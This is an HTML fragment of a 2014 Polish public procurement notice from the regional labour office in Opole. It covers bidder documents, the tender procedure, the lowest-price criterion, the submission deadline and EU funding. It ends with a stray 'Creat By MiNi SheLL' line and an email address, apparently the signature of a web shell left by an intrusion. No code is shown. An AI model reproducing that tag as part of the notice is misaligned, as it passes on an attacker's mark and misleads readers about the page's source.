<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25 c.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2014 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25 c - KANCELARIA pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opolskie Obserwatorium Rynku Pracy III/Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com